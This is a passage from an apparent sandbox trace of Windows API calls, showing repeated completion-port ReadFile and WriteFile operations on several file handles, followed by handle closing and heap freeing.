lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0156.384] CloseHandle (hObject=0x1f0) returned 1 [0156.422] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3a20020) returned 1 [0156.425] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.523] ReadFile (in: hFile=0x1c0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x35a0020) returned 1 [0157.524] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.524] WriteFile (in: hFile=0x1c0, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0x10159, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020) returned 1 [0157.527] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.528] ReadFile (in: hFile=0x1c0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0157.528] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0157.528] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0157.528] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.528] WriteFile (in: hFile=0x1c0, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020) returned 1 [0157.543] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.543] CloseHandle (hObject=0x1c0) returned 1 [0157.556] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0157.559] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.800] ReadFile (in: hFile=0x1c0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2690020) returned 1 [0157.801] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.801] ReadFile (in: hFile=0x1a4, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3480020) returned 1 [0157.801] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.801] ReadFile (in: hFile=0x1ac, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x35a0020) returned 1 [0157.802] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.802] ReadFile (in: hFile=0x1d8, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x36c0020) returned 1 [0157.802] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.802] WriteFile (in: hFile=0x1c0, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0xcfad, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020) returned 1 [0157.803] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.803] WriteFile (in: hFile=0x1a4, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0x511e, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020) returned 1 [0157.803] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.803] WriteFile (in: hFile=0x1ac, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0x1723e, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020) returned 1 [0157.804] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.804] WriteFile (in: hFile=0x1d8, lpBuffer=0x36c0124*, nNumberOfBytesToWrite=0xb09c, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x36c0020) returned 1 [0157.804] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.804] ReadFile (in: hFile=0x1c0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2690020) returned 0x0 [0157.804] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.804] ReadFile (in: hFile=0x1a4, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3480020) returned 0x0 [0157.804] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.804] ReadFile (in: hFile=0x1ac, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0157.804] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.805] ReadFile (in: hFile=0x1d8, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x36c0020) returned 0x0 [0157.805] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0157.805] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0157.805] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0157.805] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0157.805] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0157.805] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0157.805] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0157.805] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0157.805] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.805] WriteFile (in: hFile=0x1c0, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020) returned 1 [0157.805] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.805] WriteFile (in: hFile=0x1a4, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020) returned 1 [0157.806] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.806] WriteFile (in: hFile=0x1ac, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020) returned 1 [0157.806] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.806] WriteFile (in: hFile=0x1d8, lpBuffer=0x36c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x36c0020) returned 1 [0157.806] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.806] CloseHandle (hObject=0x1c0) returned 1 [0157.807] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0157.810] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.810] CloseHandle (hObject=0x1a4) returned 1 [0157.824] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0157.826] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.826] CloseHandle (hObject=0x1ac) returned 1 [0157.849] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0157.852] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.852] CloseHandle (hObject=0x1d8) returned 1 [0157.855] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x36c0020) returned 1 [0157.858] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0157.923] ReadFile (in: hFile=0x19c, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 1 [0158.083] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.084] ReadFile (in: hFile=0x1ac, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2b70020) returned 1 [0158.211] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.211] ReadFile (in: hFile=0x1a0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3630020) returned 1 [0158.211] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.211] WriteFile (in: hFile=0x19c, lpBuffer=0x710124*, nNumberOfBytesToWrite=0xd046, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0158.211] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.212] WriteFile (in: hFile=0x1cc, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0x3bcb, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3510020) returned 1 [0158.212] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.212] ReadFile (in: hFile=0x198, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2690020) returned 1 [0158.212] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.212] ReadFile (in: hFile=0x1d8, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x35a0020) returned 1 [0158.213] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.214] WriteFile (in: hFile=0x1ac, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x42400, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020) returned 1 [0158.215] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.215] WriteFile (in: hFile=0x1a0, lpBuffer=0x3630124*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3630020) returned 1 [0158.215] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.215] ReadFile (in: hFile=0x19c, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 0x0 [0158.216] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.216] ReadFile (in: hFile=0x1cc, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3510020) returned 0x0 [0158.216] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.216] WriteFile (in: hFile=0x198, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0xaf94, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020) returned 1 [0158.216] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.216] WriteFile (in: hFile=0x1d8, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0x17370, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020) returned 1 [0158.217] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.217] ReadFile (in: hFile=0x1ac, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0158.217] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.217] ReadFile (in: hFile=0x1a0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3630020) returned 0x0 [0158.217] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0158.217] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0158.217] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, 